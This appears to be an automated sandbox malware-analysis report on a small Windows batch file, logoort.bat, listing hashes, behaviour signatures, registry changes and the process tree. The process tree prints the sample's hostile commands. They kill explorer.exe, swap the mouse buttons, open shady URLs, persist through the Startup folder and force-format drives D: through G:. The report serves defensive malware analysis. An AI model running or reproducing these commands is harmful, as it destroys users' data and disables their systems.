Analysis
-
max time kernel
22s -
max time network
23s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
09/11/2024, 20:34
Static task
static1
General
-
Target
logoort.bat
-
Size
608B
-
MD5
94fd61ce02cade547895c5c9d0a0bac0
-
SHA1
313ded429034fbfc4567935bb91cc9a409066375
-
SHA256
b3a13cdc76dea743146238de8432e0c8e5a8c8b7fb43793077ac92f8a1e1771b
-
SHA512
fc100fe14d310fa6d04718a21800ee9e2f3af92b9db3f3aec062956a376834c715605994bb67053d76427a44c6f02a7a409828e5d0b61f339d9a6a92b48d17b0
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2544 cmd.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\logoort.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\logoort.bat cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Windows\assembly\Desktop.ini cmd.exe -
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\Windows\BITLOC~1\autorun.inf cmd.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\PROGRA~1\WINDOW~2\ACCESS~1\es-ES\wordpad.exe.mui cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\WEATHE~1.GAD\images\docked_black_windy.png cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\WEATHE~1.GAD\it-IT\settings.html cmd.exe File opened for modification C:\PROGRA~1\WI54FB~1\WMPNSSUI.dll cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\MEDIAC~1.GAD\images\button_left_mouseout.png cmd.exe File opened for modification C:\PROGRA~2\COMMON~1\SPEECH~1\MICROS~1\TTS20\en-US\enu-dsk\M1033DSK.WIH cmd.exe File opened for modification C:\PROGRA~2\COMMON~1\System\ado\msado26.tlb cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\es-ES\tabskb.dll.mui cmd.exe File opened for modification C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Circle_SelectionSubpictureA.png cmd.exe File opened for modification C:\PROGRA~1\WI0FCF~1\de-DE\MSPVWCTL.DLL.mui cmd.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmlaunch.exe cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\System\OLEDB~1\es-ES\oledb32r.dll.mui cmd.exe File opened for modification C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Shatter\NavigationUp_ButtonGraphic.png cmd.exe File opened for modification C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.0\it\System.Speech.resources.dll cmd.exe File opened for modification C:\PROGRA~1\WINDOW~2\TABLET~1\fr-FR\TableTextService.dll.mui cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CLOCK~1.GAD\fr-FR\css\settings.css cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\PICTUR~1.GAD\en-US\gadget.xml cmd.exe File opened for modification C:\PROGRA~3\MICROS~1\WINDOW~2\MSFax\COMMON~1\fr-FR\urgent.cov cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\de\System.IdentityModel.Selectors.Resources.dll cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\System.Workflow.ComponentModel.dll cmd.exe File opened for modification C:\PROGRA~1\WI0FCF~1\InkSeg.dll cmd.exe File opened for modification C:\PROGRA~1\WI54FB~1\en-US\WMPMediaSharing.dll.mui cmd.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\Acrobat\ActiveX\pdfshell.dll cmd.exe File opened for modification C:\PROGRA~2\WINDOW~4\ja-JP\ImagingDevices.exe.mui cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CLOCK~1.GAD\en-US\js\settings.js cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CURREN~1.GAD\images\triangle.png cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\ipsdan.xml cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.5\fr\System.Web.Entity.Design.Resources.dll cmd.exe File opened for modification C:\PROGRA~1\WINDOW~1\oeimport.dll cmd.exe File opened for modification C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\SPECIA~1\NavigationRight_SelectionSubpicture.png cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CLOCK~1.GAD\it-IT\gadget.xml cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CURREN~1.GAD\images\combo-hover-left.png cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CURREN~1.GAD\es-ES\js\service.js cmd.exe File opened for modification C:\PROGRA~1\WI54FB~1\it-IT\wmplayer.exe.mui cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\de-DE\js\localizedStrings.js cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\images\docked_gray_thunderstorm.png cmd.exe File opened for modification C:\PROGRA~1\WINDOW~4\ja-JP\PhotoViewer.dll.mui cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\images\16.png cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\WEATHE~1.GAD\images\docked_black_moon-first-quarter.png cmd.exe File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Resource\Font\PFM\SY______.PFM cmd.exe File opened for modification C:\PROGRA~2\WI54FB~1\ja-JP\setup_wm.exe.mui cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CLOCK~1.GAD\images\modern_m.png cmd.exe File opened for modification C:\PROGRA~2\WINDOW~4\PhotoAcq.dll cmd.exe File opened for modification C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Pets\Notes_LOOP_BG_PAL.wmv cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\es\WindowsBase.resources.dll cmd.exe File opened for modification C:\PROGRA~1\WI54FB~1\fr-FR\WMPDMCCore.dll.mui cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CLOCK~1.GAD\images\diner.png cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\CPU~1.GAD\images\back.png cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\SLIDES~1.GAD\fr-FR\settings.html cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\fr-FR\weather.html cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CALEND~1.GAD\fr-FR\css\calendar.css cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\el-GR\tipresx.dll.mui cmd.exe File opened for modification C:\PROGRA~1\MSBuild\MICROS~1\WINDOW~1\v3.5\Workflow.Targets cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\CLOCK~1.GAD\fr-FR\js\clock.js cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\FSDEFI~1\main\base_rtl.xml cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\de-DE\css\localizedSettings.css cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\WEATHE~1.GAD\it-IT\css\weather.css cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\WEATHE~1.GAD\images\docked-loading.png cmd.exe File opened for modification C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Pets\Notes_INTRO_BG_PAL.wmv cmd.exe File opened for modification C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Sports\SceneButtonInset_Alpha2.png cmd.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\ink\ja-JP\micaut.dll.mui cmd.exe File opened for modification C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\ja-JP\js\library.js cmd.exe File opened for modification C:\PROGRA~2\COMMON~1\System\OLEDB~1\msdatt.dll cmd.exe File opened for modification C:\PROGRA~2\WI4223~1\Gadgets\CPU~1.GAD\images\dial_lrg.png cmd.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Help\Windows\it-IT\hgroupp.h1s cmd.exe File opened for modification C:\Windows\IME\SPTIP.DLL cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\v3.0\WINDOW~1\it-IT\ServiceModelInstallRC.dll.mui cmd.exe File opened for modification C:\Windows\Cursors\aero_ew_l.cur cmd.exe File opened for modification C:\Windows\Help\Windows\fr-FR\presset.h1s cmd.exe File opened for modification C:\Windows\Media\Garden\Windows Balloon.wav cmd.exe File opened for modification C:\Windows\Media\Raga\Windows Balloon.wav cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\v3.0\WINDOW~1\fr\ServiceModelReg.resources.dll cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~2\V20~1.507\System.DirectoryServices.dll cmd.exe File opened for modification C:\Windows\DIAGNO~1\system\NETWOR~1\en-US\LocalizationData.psd1 cmd.exe File opened for modification C:\Windows\ehome\MEDIAR~1\MediaCenter.DigitalMediaRenderer.ConnectionManager.xml cmd.exe File opened for modification C:\Windows\Help\mui\0410\gpedit.CHM cmd.exe File opened for modification C:\Windows\IME\IMESC5\DICTS\PINTLGCF.IMD cmd.exe File opened for modification C:\Windows\Media\Festival\Windows Battery Low.wav cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\V20~1.507\JA\System.Design.Resources.dll cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\V20~1.507\System.Web.tlb cmd.exe File opened for modification C:\Windows\Boot\EFI\de-DE\bootmgfw.efi.mui cmd.exe File opened for modification C:\Windows\ehome\segmcsb.ttf cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\V20~1.507\1040\vbc7ui.dll cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\V20~1.507\System.Transactions.dll cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~2\V20~1.507\JA\System.Deployment.resources.dll cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~2\V20~1.507\Microsoft.Build.Engine.dll cmd.exe File opened for modification C:\Windows\Fonts\mvboli.ttf cmd.exe File opened for modification C:\Windows\Help\mui\040C\connmgr.CHM cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\V20~1.507\ngen.exe cmd.exe File opened for modification C:\Windows\DIAGNO~1\system\PCW\en-US\CL_LocalizationData.psd1 cmd.exe File opened for modification C:\Windows\ehome\wow\ehexthost32.exe.config cmd.exe File opened for modification C:\Windows\Help\Windows\de-DE\artui.h1s cmd.exe File opened for modification C:\Windows\Media\AFTERN~1\Windows Hardware Fail.wav cmd.exe File opened for modification C:\Windows\Media\CHARAC~1\Windows Battery Critical.wav cmd.exe File opened for modification C:\Windows\ehome\ehsched.exe cmd.exe File opened for modification C:\Windows\Help\mui\0411\comexp.CHM cmd.exe File opened for modification C:\Windows\Fonts\LaoUI.ttf cmd.exe File opened for modification C:\Windows\Help\mui\0411\netcfg.CHM cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\v3.0\WINDOW~1\de-DE\ServiceModelEvents.dll.mui cmd.exe File opened for modification C:\Windows\BITLOC~1\th-TH_BitLockerToGo.exe.mui cmd.exe File opened for modification C:\Windows\Boot\PCAT\de-DE\bootmgr.exe.mui cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\V20~1.507\GAC\fr\Microsoft.VisualBasic.Compatibility.resources.dll cmd.exe File opened for modification C:\Windows\Media\CITYSC~1\Windows Notify.wav cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\V20~1.507\fr\System.Web.Resources.dll cmd.exe File opened for modification C:\Windows\Help\mui\0407\aclui.CHM cmd.exe File opened for modification C:\Windows\Media\Delta\Windows Battery Critical.wav cmd.exe File opened for modification C:\Windows\Media\Raga\Windows Print complete.wav cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\v3.5\AddInUtil.exe cmd.exe File opened for modification C:\Windows\Cursors\libeam.cur cmd.exe File opened for modification C:\Windows\ehome\en-US\ehcmres.dll.mui cmd.exe File opened for modification C:\Windows\Help\Windows\ja-JP\diskcln.h1s cmd.exe File opened for modification C:\Windows\inf\NETDAT~2\0C0A\_dataperfcounters_shared12_neutral_D.ini cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~2\V20~1.507\fr\System.DirectoryServices.Protocols.resources.dll cmd.exe File opened for modification C:\Windows\DIAGNO~1\system\Search\RS_RestorePermissions.ps1 cmd.exe File opened for modification C:\Windows\ehome\CREATE~1\COMPON~1\tables\alloc_1 cmd.exe File opened for modification C:\Windows\Help\mui\0410\nfs_.CHM cmd.exe File opened for modification C:\Windows\Help\Windows\it-IT\auxdisp.h1s cmd.exe File opened for modification C:\Windows\Help\Windows\it-IT\secstart.h1s cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~1\v3.5\AddInUtil.exe.config cmd.exe File opened for modification C:\Windows\Branding\Basebrd\ja-JP\basebrd.dll.mui cmd.exe File opened for modification C:\Windows\Cursors\pen_l.cur cmd.exe File opened for modification C:\Windows\MICROS~1.NET\FRAMEW~2\V20~1.507\DE\System.EnterpriseServices.Resources.dll cmd.exe File opened for modification C:\Windows\Help\Windows\en-US\sysman.h1s cmd.exe File opened for modification C:\Windows\inf\usbhub\0407\usbperf.ini cmd.exe File opened for modification C:\Windows\Help\mui\040C\qos.CHM cmd.exe File opened for modification C:\Windows\Help\Windows\en-US\medctr.h1s cmd.exe File opened for modification C:\Windows\Help\Windows\en-US\presset.h1s cmd.exe File opened for modification C:\Windows\Media\CITYSC~1 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Kills process with taskkill 1 IoCs
pid Process 2696 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8FA35E21-9E2D-11EF-A4F8-F6F033B50202} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8FA820E1-9E2D-11EF-A4F8-F6F033B50202} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeSystemtimePrivilege 2544 cmd.exe Token: SeSystemtimePrivilege 2544 cmd.exe Token: SeDebugPrivilege 2696 taskkill.exe -
Suspicious use of FindShellTrayWindow 16 IoCs
pid Process 2680 iexplore.exe 2680 iexplore.exe 2844 iexplore.exe 2844 iexplore.exe 2844 iexplore.exe 2844 iexplore.exe 2844 iexplore.exe 2844 iexplore.exe 2844 iexplore.exe 2844 iexplore.exe 2680 iexplore.exe 2680 iexplore.exe 2680 iexplore.exe 2680 iexplore.exe 2680 iexplore.exe 2680 iexplore.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2844 iexplore.exe 2844 iexplore.exe 2680 iexplore.exe 2680 iexplore.exe 2448 IEXPLORE.EXE 2448 IEXPLORE.EXE 2272 IEXPLORE.EXE 2272 IEXPLORE.EXE 2272 IEXPLORE.EXE 2272 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2544 wrote to memory of 1644 2544 cmd.exe 30 PID 2544 wrote to memory of 1644 2544 cmd.exe 30 PID 2544 wrote to memory of 1644 2544 cmd.exe 30 PID 2544 wrote to memory of 2696 2544 cmd.exe 31 PID 2544 wrote to memory of 2696 2544 cmd.exe 31 PID 2544 wrote to memory of 2696 2544 cmd.exe 31 PID 2544 wrote to memory of 2848 2544 cmd.exe 33 PID 2544 wrote to memory of 2848 2544 cmd.exe 33 PID 2544 wrote to memory of 2848 2544 cmd.exe 33 PID 2544 wrote to memory of 2844 2544 cmd.exe 34 PID 2544 wrote to memory of 2844 2544 cmd.exe 34 PID 2544 wrote to memory of 2844 2544 cmd.exe 34 PID 2544 wrote to memory of 2680 2544 cmd.exe 35 PID 2544 wrote to memory of 2680 2544 cmd.exe 35 PID 2544 wrote to memory of 2680 2544 cmd.exe 35 PID 2544 wrote to memory of 1092 2544 cmd.exe 36 PID 2544 wrote to memory of 1092 2544 cmd.exe 36 PID 2544 wrote to memory of 1092 2544 cmd.exe 36 PID 2544 wrote to memory of 2292 2544 cmd.exe 37 PID 2544 wrote to memory of 2292 2544 cmd.exe 37 PID 2544 wrote to memory of 2292 2544 cmd.exe 37 PID 2544 wrote to memory of 2012 2544 cmd.exe 38 PID 2544 wrote to memory of 2012 2544 cmd.exe 38 PID 2544 wrote to memory of 2012 2544 cmd.exe 38 PID 2544 wrote to memory of 2576 2544 cmd.exe 39 PID 2544 wrote to memory of 2576 2544 cmd.exe 39 PID 2544 wrote to memory of 2576 2544 cmd.exe 39 PID 2844 wrote to memory of 2272 2844 iexplore.exe 40 PID 2844 wrote to memory of 2272 2844 iexplore.exe 40 PID 2844 wrote to memory of 2272 2844 iexplore.exe 40 PID 2844 wrote to memory of 2272 2844 iexplore.exe 40 PID 2680 wrote to memory of 2448 2680 iexplore.exe 41 PID 2680 wrote to memory of 2448 2680 iexplore.exe 41 PID 2680 wrote to memory of 2448 2680 iexplore.exe 41 PID 2680 wrote to memory of 2448 2680 iexplore.exe 41
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\logoort.bat"1⤵
- Deletes itself
- Drops startup file
- Drops desktop.ini file(s)
- Drops autorun.inf file
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\msg.exemsg * (Muhahaha)2⤵PID:1644
-
-
C:\Windows\system32\taskkill.exetaskkill /IM explorer.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\system32\rundll32.exeRundll32 user32, SwapMouseButton2⤵PID:2848
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.evil-shit.de/2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2272
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.akk.li/pics/anne/jpg2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2680 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2448
-
-
-
C:\Windows\system32\format.comformat D:\ /F2⤵PID:1092
-
-
C:\Windows\system32\format.comformat E:\ /F2⤵PID:2292
-
-
C:\Windows\system32\format.comformat F:\ /F2⤵PID:2012
-
-
C:\Windows\system32\format.comformat G:\ /F2⤵PID:2576
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
342B
MD5c941db018d52a173604ff137bd370dd9
SHA1a746b2fdcef1c8e63bbf27732f89fb07dd017ea9
SHA2560cd42f38b4c9862815b99b7a5583d3534c486e9994dbb43b3347915747745818
SHA512a56f40ecc28ee1c63aed118363d5155c4a8b880127534f9e9fe0d937ffdc0424a5474af1223b2dfd37038e904a5bb02e71b647bb7fc77e3cb2f098667816e8b4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD548b1eed8ecde338fd3a7e13fc6b51c50
SHA1325648e935d7ada3abbd8b8cc76538d4e219080c
SHA2568a6136dabca57e829254f27ff0adae6744c63cd4a41fa8fbe9d67effb7e0bafa
SHA5124471cc90d665f2f9e90a08e2ddda191add7a526efdbc040d3562a140b84f3cd91ea50b1d4cee19e42e165eb6f0be41d6ed29f30bdbcd51eee9f1086f61d40a00
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD595c208e5596aa6bd381eabfb6925a7b1
SHA1cd3fcfbb3d7e4c3ac3e199d86017c2b868e36bb9
SHA256f8f1dfbc92bccfca76856e3e14c148b9cc263023f983525378fc022b4c6b749e
